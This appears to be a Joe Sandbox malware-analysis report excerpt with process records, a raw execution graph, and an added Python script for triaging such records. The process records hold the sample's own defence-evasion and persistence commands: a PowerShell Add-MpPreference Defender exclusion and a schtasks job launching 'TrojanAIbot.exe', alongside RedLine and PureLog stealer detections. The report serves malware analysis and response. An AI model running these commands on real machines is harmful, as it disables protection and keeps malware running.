                                                                                                                                                                                                                                                                                                          MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                                                          Start time:04:07:22
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:882AAAB29114AA61C89B0726B6FA58A4
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:false

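As an added example (not part of the Joe Sandbox report or its tooling), the following Python script parses process records in the key:value form used above and extracts the facts a responder acts on first: which Yara rules fired per process, which rules fired only in memory dumps (a runtime-unpacked payload that file-hash IOCs will not cover), which Windows Defender exclusions a process added, and which processes run from user-writable AppData paths. The SAMPLE_REPORT excerpt is constructed from the values of Targets 6, 9 and 10 in this report; all function names are the example's own.

```python
"""Triage helper for Joe Sandbox process records (added example, not report code)."""
import re

# Constructed excerpt mirroring the report's own records for Targets 6, 9 and 10.
SAMPLE_REPORT = r"""
Target ID:6
Path:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
Commandline:"C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
MD5 hash:8C8785AC6585CF5C794B74330B3DB88F
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2117556197.0000000000012000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2132146464.00000000123E2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
Has exited:true

Target ID:9
Path:C:\Windows\System32\alg.exe
Commandline:C:\Windows\System32\alg.exe
MD5 hash:882AAAB29114AA61C89B0726B6FA58A4
Has exited:false

Target ID:10
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Has exited:true
"""

# Matches "-ExclusionPath 'x'" / "-ExclusionProcess x" style arguments (quoted or bare).
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+-Exclusion(Path|Process|Extension)\s+(?:'([^']*)'|(\S+))",
    re.IGNORECASE,
)
USER_WRITABLE_RE = re.compile(r"\\AppData\\(Local|Roaming)\\", re.IGNORECASE)


def parse_processes(text):
    """Split report text into one dict per 'Target ID' block.
    Scalar fields stay strings; 'Yara matches' becomes a list of rule dicts."""
    processes, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Target ID:"):
            current = {"Target ID": line.split(":", 1)[1].strip(), "Yara matches": []}
            processes.append(current)
        elif current is None or line == "Yara matches:":
            continue  # header line or text before the first record
        elif line.lstrip("• ").startswith("Rule: "):
            # "Rule: X, Description: Y, Source: Z, Author: W" -> dict
            parts = line.lstrip("• ").split(", ")
            current["Yara matches"].append(
                dict(p.split(": ", 1) for p in parts if ": " in p)
            )
        elif ":" in line:
            key, value = line.split(":", 1)
            current[key.strip()] = value.strip()
    return processes


def yara_families(processes):
    """Target ID -> sorted rule names that matched it, on disk or in memory."""
    return {
        p["Target ID"]: sorted({m["Rule"] for m in p["Yara matches"]})
        for p in processes if p["Yara matches"]
    }


def memory_only_rules(proc):
    """Rules that fired only on memory dumps (.sdmp) and never on the file on disk:
    the payload is unpacked at runtime, so a disk-only scan can miss it."""
    in_mem = {m["Rule"] for m in proc["Yara matches"] if m["Source"].endswith(".sdmp")}
    on_disk = {m["Rule"] for m in proc["Yara matches"] if not m["Source"].endswith(".sdmp")}
    return sorted(in_mem - on_disk)


def defender_exclusions(processes):
    """(Target ID, kind, value) for every Defender exclusion added via Add-MpPreference."""
    found = []
    for p in processes:
        for kind, quoted, bare in EXCLUSION_RE.findall(p.get("Commandline", "")):
            found.append((p["Target ID"], kind, quoted or bare))
    return found


def user_writable_processes(processes):
    """Target IDs of processes whose image lives under a user's AppData tree."""
    return [p["Target ID"] for p in processes if USER_WRITABLE_RE.search(p.get("Path", ""))]


def triage(text):
    procs = parse_processes(text)
    return {
        "yara": yara_families(procs),
        "memory_only": {p["Target ID"]: memory_only_rules(p) for p in procs if memory_only_rules(p)},
        "defender_exclusions": defender_exclusions(procs),
        "user_writable": user_writable_processes(procs),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_REPORT).items():
        print(f"{key}: {value}")
```

The exclusion path the script recovers is the first thing to undo on an infected host (Remove-MpPreference -ExclusionPath takes the same value), and the memory-only rule hits tell you which family names to expect from memory scanning rather than from the dropped files' hashes.
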
Target ID:10
Start time:04:07:24
Start date:10/10/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:0xbe0000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                                                          Start time:04:07:24
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                                                          Start time:04:07:24
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 04:12 /du 23:59 /sc daily /ri 1 /f
                                                                                                                                                                                                                                                                                                          Imagebase:0x540000
                                                                                                                                                                                                                                                                                                          File size:187'904 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                                                                          Start time:04:07:24
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                                                                          Start time:04:07:25
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x7d0000
                                                                                                                                                                                                                                                                                                          File size:231'936 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                                                          Start time:04:07:25
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd""
                                                                                                                                                                                                                                                                                                          Imagebase:0x790000
                                                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                                                          Start time:04:07:25
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:04:07:25
Start date:10/10/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout 6
Imagebase:0x350000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:04:07:26
Start date:10/10/2024
Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Imagebase:0xd50000
File size:231'936 bytes
MD5 hash:50D015016F20DA0905FD5B37D7834823
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:04:07:27
Start date:10/10/2024
Path:C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:138'056 bytes
MD5 hash:BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:20
Start time:04:07:27
Start date:10/10/2024
Path:C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:174'408 bytes
MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:04:07:27
Start date:10/10/2024
Path:C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:154'952 bytes
MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:C, C++ or other language
Has exited:false

Target ID:22
Start time:04:07:27
Start date:10/10/2024
Path:C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\AppVClient.exe
Imagebase:0x140000000
File size:1'348'608 bytes
MD5 hash:5308671F56D4A4A4CDF6FF841AEF1780
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:23
Start time:04:07:28
Start date:10/10/2024
Path:C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:0x7ff6ef0c0000
File size:496'640 bytes
MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:04:07:30
Start date:10/10/2024
Path:C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\fxssvc.exe
Imagebase:0x140000000
File size:1'242'624 bytes
MD5 hash:283D4068FC62E71EA43B248224FAE579
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:04:07:33
Start date:10/10/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:2'354'176 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:AC37DAB395406B7A2E223F34625726DE
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                                                                          Start time:04:07:34
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'356'800 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:F20BF005553AB1557724E26FBFDB22C5
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                                                                                                                                          Start time:04:07:35
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'278'464 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:46966EB01AA74C66C8C45009CAFCA510
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                                                                                                                                          Start time:04:07:35
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                                                                                                                                                                                                                          Imagebase:0xe80000
                                                                                                                                                                                                                                                                                                          File size:231'936 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                                                          Target ID:32
                                                                                                                                                                                                                                                                                                          Start time:04:07:37
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'235'968 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:367BAC61864EA78BE8F89AAEA741C1B2
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          Target ID:33
                                                                                                                                                                                                                                                                                                          Start time:04:07:38
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                                                          File size:1'150'976 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:AFAD48DC29F1CF4A38DCFFCDB37F8BA9
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                                                          Target ID:34
                                                                                                                                                                                                                                                                                                          Start time:04:07:38
                                                                                                                                                                                                                                                                                                          Start date:10/10/2024
                                                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                          File size:1'141'248 bytes
                                                                                                                                                                                                                                                                                                          MD5 hash:3A5699061E1911C756244F5DD3EFCD56
                                                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
Has exited:false

Target ID:35
Start time:04:07:40
Start date:10/10/2024
Path:C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\SensorDataService.exe
Imagebase:0x140000000
File size:1'846'784 bytes
MD5 hash:A30B8B3725152FFD1FEF45C52D3261B8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:36
Start time:04:07:41
Start date:10/10/2024
Path:C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\snmptrap.exe
Imagebase:0x140000000
File size:1'146'880 bytes
MD5 hash:7D3200FA5E7F0DAE65D4ECB41018A0E8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:37
Start time:04:07:42
Start date:10/10/2024
Path:C:\Windows\System32\Spectrum.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\spectrum.exe
Imagebase:0x140000000
File size:1'455'616 bytes
MD5 hash:2DDE61D6384346F05BA3DA4D78A1740A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:39
Start time:04:07:43
Start date:10/10/2024
Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
Imagebase:0x140000000
File size:1'511'424 bytes
MD5 hash:03402E65F6A814316E26E0D2EB369ABC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:40
Start time:04:07:43
Start date:10/10/2024
Path:C:\Windows\System32\TieringEngineService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\TieringEngineService.exe
Imagebase:0x140000000
File size:1'455'616 bytes
MD5 hash:10F8624709D07DA72863BBB00DFD5D16
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:41
Start time:04:07:44
Start date:10/10/2024
Path:C:\Windows\System32\AgentService.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\AgentService.exe
Imagebase:0x140000000
File size:1'801'216 bytes
MD5 hash:FB45B515238278E8D72072D18DD7382C
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:04:07:45
Start date:10/10/2024
Path:C:\Windows\System32\vds.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\vds.exe
Imagebase:0x140000000
File size:1'303'552 bytes
MD5 hash:2EE227E57FDD41A436C3DE33802B4D02
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:44
Start time:04:07:47
Start date:10/10/2024
Path:C:\Windows\System32\wbengine.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\wbengine.exe"
Imagebase:0x140000000
File size:2'164'736 bytes
MD5 hash:21B54458FED133A5634A8ABCCB5B5220
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 1.2%
Signature Coverage: 3.3%
Total number of Nodes: 1617
Total number of Limit Nodes: 48
85829->85802 85831 414885 85830->85831 85835 4148a7 85830->85835 85832 41453a __fileno 67 API calls 85831->85832 85831->85835 85833 4148a0 85832->85833 85871 41c3cf 101 API calls 5 library calls 85833->85871 85836 41453a 85835->85836 85837 414549 85836->85837 85841 41455e 85836->85841 85872 417f23 67 API calls __getptd_noexit 85837->85872 85839 41454e 85873 417ebb 6 API calls 2 library calls 85839->85873 85842 41efd4 85841->85842 85843 41efe0 __setmode 85842->85843 85844 41f003 85843->85844 85845 41efe8 85843->85845 85846 41f011 85844->85846 85851 41f052 85844->85851 85894 417f36 67 API calls __getptd_noexit 85845->85894 85896 417f36 67 API calls __getptd_noexit 85846->85896 85849 41efed 85895 417f23 67 API calls __getptd_noexit 85849->85895 85850 41f016 85897 417f23 67 API calls __getptd_noexit 85850->85897 85874 41ba3b 85851->85874 85855 41f01d 85898 417ebb 6 API calls 2 library calls 85855->85898 85856 41f058 85858 41f065 85856->85858 85859 41f07b 85856->85859 85884 41ef5f 85858->85884 85899 417f23 67 API calls __getptd_noexit 85859->85899 85861 41eff5 __setmode 85861->85804 85863 41f080 85900 417f36 67 API calls __getptd_noexit 85863->85900 85864 41f073 85901 41f0a6 LeaveCriticalSection __unlock_fhandle 85864->85901 85867->85804 85868->85819 85870->85829 85871->85835 85872->85839 85875 41ba47 __setmode 85874->85875 85876 41baa2 85875->85876 85877 418407 __lock 67 API calls 85875->85877 85878 41bac4 __setmode 85876->85878 85879 41baa7 EnterCriticalSection 85876->85879 85880 41ba73 85877->85880 85878->85856 85879->85878 85881 41ba8a 85880->85881 85882 4189e6 __getstream InitializeCriticalSectionAndSpinCount 85880->85882 85883 41bad2 ___lock_fhandle LeaveCriticalSection 85881->85883 85882->85881 85883->85876 85885 41b9c4 __commit 67 API calls 85884->85885 85886 41ef6e 85885->85886 85887 41ef84 SetFilePointer 85886->85887 85888 41ef74 85886->85888 85890 41efa3 85887->85890 85891 41ef9b GetLastError 85887->85891 85889 417f23 __setmode 67 API calls 85888->85889 85893 
41ef79 85889->85893 85892 417f49 __dosmaperr 67 API calls 85890->85892 85890->85893 85891->85890 85892->85893 85893->85864 85894->85849 85895->85861 85896->85850 85897->85855 85899->85863 85900->85864 85901->85861 85903 414e31 85902->85903 85904 414e4d 85902->85904 85948 417f23 67 API calls __getptd_noexit 85903->85948 85907 414e46 85904->85907 85908 41486c __flush 101 API calls 85904->85908 85906 414e36 85949 417ebb 6 API calls 2 library calls 85906->85949 85920 414f08 LeaveCriticalSection LeaveCriticalSection _ftell 85907->85920 85910 414e59 85908->85910 85921 41e680 85910->85921 85913 41453a __fileno 67 API calls 85914 414e67 85913->85914 85925 41e5b3 85914->85925 85916 414e6d 85916->85907 85917 413a88 __fcloseall 67 API calls 85916->85917 85917->85907 85918->85650 85920->85654 85922 41e690 85921->85922 85923 414e61 85921->85923 85922->85923 85924 413a88 __fcloseall 67 API calls 85922->85924 85923->85913 85924->85923 85926 41e5bf __setmode 85925->85926 85927 41e5e2 85926->85927 85928 41e5c7 85926->85928 85929 41e5f0 85927->85929 85935 41e631 85927->85935 85965 417f36 67 API calls __getptd_noexit 85928->85965 85967 417f36 67 API calls __getptd_noexit 85929->85967 85931 41e5cc 85966 417f23 67 API calls __getptd_noexit 85931->85966 85934 41e5f5 85968 417f23 67 API calls __getptd_noexit 85934->85968 85937 41ba3b ___lock_fhandle 68 API calls 85935->85937 85938 41e637 85937->85938 85940 41e652 85938->85940 85941 41e644 85938->85941 85939 41e5fc 85969 417ebb 6 API calls 2 library calls 85939->85969 85970 417f23 67 API calls __getptd_noexit 85940->85970 85950 41e517 85941->85950 85945 41e64c 85971 41e676 LeaveCriticalSection __unlock_fhandle 85945->85971 85946 41e5d4 __setmode 85946->85916 85948->85906 85972 41b9c4 85950->85972 85952 41e57d 85985 41b93e 68 API calls 2 library calls 85952->85985 85953 41e55b 85953->85952 85957 41b9c4 __commit 67 API calls 85953->85957 85954 41e527 85954->85952 85954->85953 85956 41b9c4 __commit 67 API calls 85954->85956 85959 41e552 
